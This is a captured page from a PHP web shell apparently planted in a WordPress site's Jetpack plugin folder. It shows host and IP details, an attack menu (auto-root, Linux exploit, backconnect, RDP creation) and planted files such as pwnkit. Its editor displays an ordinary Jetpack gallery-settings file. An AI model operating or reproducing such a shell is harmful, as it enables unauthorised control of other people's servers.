Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jetpack_vendor
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
773.27
KB
-rw-r--r--
LICENSE.txt
18.2
KB
-rw-r--r--
SECURITY.md
2.45
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
class-jetpack-connection-statu...
728
B
-rw-r--r--
class-jetpack-gallery-settings...
3.47
KB
-rw-r--r--
class-jetpack-newsletter-dashb...
436
B
-rw-r--r--
class-jetpack-pre-connection-j...
2.34
KB
-rw-r--r--
class-jetpack-stats-dashboard-...
7.46
KB
-rw-r--r--
class-jetpack-xmlrpc-methods.p...
7.38
KB
-rw-r--r--
class.frame-nonce-preview.php
3.22
KB
-rw-r--r--
class.jetpack-admin.php
21.28
KB
-rw-r--r--
class.jetpack-autoupdate.php
9.93
KB
-rw-r--r--
class.jetpack-cli.php
74.32
KB
-rw-r--r--
class.jetpack-client-server.ph...
2.62
KB
-rw-r--r--
class.jetpack-gutenberg.php
45.32
KB
-rw-r--r--
class.jetpack-heartbeat.php
4.44
KB
-rw-r--r--
class.jetpack-modules-list-tab...
14.81
KB
-rw-r--r--
class.jetpack-network-sites-li...
6.03
KB
-rw-r--r--
class.jetpack-network.php
22.19
KB
-rw-r--r--
class.jetpack-plan.php
4.09
KB
-rw-r--r--
class.jetpack-post-images.php
11.72
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
5.69
KB
-rw-r--r--
class.jetpack-user-agent.php
25.3
KB
-rw-r--r--
class.jetpack.php
205.12
KB
-rw-r--r--
class.json-api-endpoints.php
91.64
KB
-rw-r--r--
class.json-api.php
38.3
KB
-rw-r--r--
class.photon.php
1.74
KB
-rw-r--r--
composer.json
4.29
KB
-rw-r--r--
enhanced-open-graph.php
4.71
KB
-rw-r--r--
functions.compat.php
4.34
KB
-rw-r--r--
functions.cookies.php
2.04
KB
-rw-r--r--
functions.global.php
15.87
KB
-rw-r--r--
functions.is-mobile.php
2.47
KB
-rw-r--r--
functions.opengraph.php
30.99
KB
-rw-r--r--
functions.photon.php
3.04
KB
-rw-r--r--
jetpack.php
8.92
KB
-rw-r--r--
json-api-config.php
338
B
-rw-r--r--
json-endpoints.php
6.92
KB
-rw-r--r--
load-jetpack.php
3.69
KB
-rw-r--r--
locales.php
371
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
33.65
KB
-rw-r--r--
unauth-file-upload.php
5.85
KB
-rw-r--r--
uninstall.php
1.65
KB
-rw-r--r--
wpml-config.xml
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-jetpack-gallery-settings.php
<?php /** * Adding extra functions for the gallery. * * @package automattic/jetpack */ use Automattic\Jetpack\Assets; if ( ! defined( 'ABSPATH' ) ) { exit( 0 ); } /** * Renders extra controls in the Gallery Settings section of the new media UI. * * @phan-constructor-used-for-side-effects */ class Jetpack_Gallery_Settings { /** * Available gallery types. * * @var array */ public $gallery_types; /** * The constructor. */ public function __construct() { add_action( 'admin_init', array( $this, 'admin_init' ) ); } /** * Initialize the admin resources. */ public function admin_init() { /** * Filter the available gallery types. * * @module shortcodes, tiled-gallery * * @since 2.5.1 * * @param array $value Array of the default thumbnail grid gallery type. Default array contains one key, ‘default’. */ $this->gallery_types = apply_filters( 'jetpack_gallery_types', array( 'default' => __( 'Thumbnail Grid', 'jetpack' ) ) ); // Enqueue the media UI only if needed. if ( is_countable( $this->gallery_types ) && count( $this->gallery_types ) > 1 ) { add_action( 'wp_enqueue_media', array( $this, 'wp_enqueue_media' ) ); add_action( 'print_media_templates', array( $this, 'print_media_templates' ) ); } // Add Slideshow and Galleries functionality to core's media gallery widget. add_filter( 'widget_media_gallery_instance_schema', array( $this, 'core_media_widget_compat' ) ); } /** * Updates the schema of the core gallery widget so we can save the * fields that we add to Gallery Widgets, like `type` and `conditions` * * @param array $schema The current schema for the core gallery widget. * @return array the updated schema */ public function core_media_widget_compat( $schema ) { $schema['type'] = array( 'type' => 'string', 'enum' => array_keys( $this->gallery_types ), 'description' => __( 'Type of gallery.', 'jetpack' ), 'default' => 'default', ); return $schema; } /** * Registers/enqueues the gallery settings admin js. */ public function wp_enqueue_media() { if ( ! wp_script_is( 'jetpack-gallery-settings', 'registered' ) ) { /** * This only happens if we're not in Jetpack, but on WPCOM instead. * This is the correct path for WPCOM. */ wp_register_script( 'jetpack-gallery-settings', Assets::get_file_url_for_environment( '_inc/build/gallery-settings.min.js', '_inc/gallery-settings.js' ), array( 'jquery', 'media-views' ), '20121225', false ); } wp_enqueue_script( 'jetpack-gallery-settings' ); } /** * Outputs a view template which can be used with wp.media.template */ public function print_media_templates() { /** * Filter the default gallery type. * * @module tiled-gallery * * @since 2.5.1 * * @param string $value A string of the gallery type. Default is ‘default’. */ $default_gallery_type = apply_filters( 'jetpack_default_gallery_type', 'default' ); ?> <script type="text/html" id="tmpl-jetpack-gallery-settings"> <label class="setting"> <span><?php esc_html_e( 'Type', 'jetpack' ); ?></span> <select class="type" name="type" data-setting="type"> <?php foreach ( $this->gallery_types as $value => $caption ) : ?> <option value="<?php echo esc_attr( $value ); ?>" <?php selected( $value, $default_gallery_type ); ?>><?php echo esc_html( $caption ); ?></option> <?php endforeach; ?> </select> </label> </script> <?php } } new Jetpack_Gallery_Settings();
Close